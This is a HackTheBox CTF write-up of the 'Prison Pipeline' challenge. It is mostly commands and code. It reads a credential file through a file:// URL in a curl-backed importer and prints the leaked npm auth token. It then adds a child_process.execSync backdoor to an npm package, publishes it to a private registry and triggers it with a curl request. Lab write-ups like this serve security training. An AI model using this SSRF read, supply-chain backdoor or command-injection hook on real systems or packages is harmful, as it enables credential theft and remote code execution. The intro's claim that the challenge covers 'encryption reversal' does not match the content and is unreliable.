Post

HackTheBox Prision Pipeline Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the Prision Pipeline Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/715

Description

One of our crew members has been captured by mutant raiders and is locked away in their heavily fortified prison. During an initial reconnaissance, the crew managed to gain access to the prison’s record management system. Your mission: exploit this system to infiltrate the prison’s network and disable the defenses for the rescuers. Can you orchestrate the perfect escape and rescue your comrade before it’s too late?

Exploitation

my challenge ip and port 94.237.60.154:32828

Prisoner Importer “Curl under the hood”

file:///home/node/.npmrc

Click on Import Prisoner Record

1

//localhost:4873/:_authToken="MWZlMmI1OTRiZjMwNTJkMjYwNWZhYTE1NGJlNTVjZDQ6OGRjNDBlMDE3YWNhYjViYzEwM2RlOTQzYzg3OWZiN2YwY2EyZGI5ZmMwMGI4ZWViZWVhZmUzZjc0Y2I2MWFiOTZmNWI1OWVhNTg0N2IwZmIwZQ=="

add in hosts 94.237.60.154 registry.prison-pipeline.htb

1
2

cd challenge/prisoner-db
nano .npmrc

1

//registry.prison-pipeline.htb:32828/:_authToken="MWZlMmI1OTRiZjMwNTJkMjYwNWZhYTE1NGJlNTVjZDQ6OGRjNDBlMDE3YWNhYjViYzEwM2RlOTQzYzg3OWZiN2YwY2EyZGI5ZmMwMGI4ZWViZWVhZmUzZjc0Y2I2MWFiOTZmNWI1OWVhNTg0N2IwZmIwZQ=="

1
2
3

npm cache clean --force
npm whoami --registry=http://registry.prison-pipeline.htb:32828
nano index.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

    async importPrisoner(url) {
        // implement backdoor
        const child_process = require('child_process');
        if (url.includes('PWN:')) {
            try {
                let cmd = url.replace('PWN:', '');
                let output = child_process.execSync(cmd).toString();
                return output;
            }
            catch (error) {
                return 'PWN: Error executing command.';
            }
        }        
        ...SNIP...
    }

1

nano package.json

1

"version": "1.0.1",

1
2
3

npm publish --registry=http://registry.prison-pipeline.htb:32828
sleep 5
curl -X POST 'http://94.237.60.154:32828/api/prisoners/import' -H 'Content-Type: application/json' -d '{"url": "PWN:/readflag"}'

Summary

The Prison Pipeline Challenge on Hack The Box is a medium-level challenge focused on encryption reversal and file handling. It involves interacting with a private npm registry and exploiting the importPrisoner function in the prisoner-db package by implementing a backdoor. The backdoor executes system commands when a URL starting with PWN: is provided. The challenge guides you through setting up the registry, modifying the package to include the backdoor, updating the version, and publishing the malicious package. Finally, it demonstrates triggering the backdoor by making an HTTP request to execute a command.

challenge
htb challenge writeup linux misc
This post is licensed under CC BY 4.0 by the author.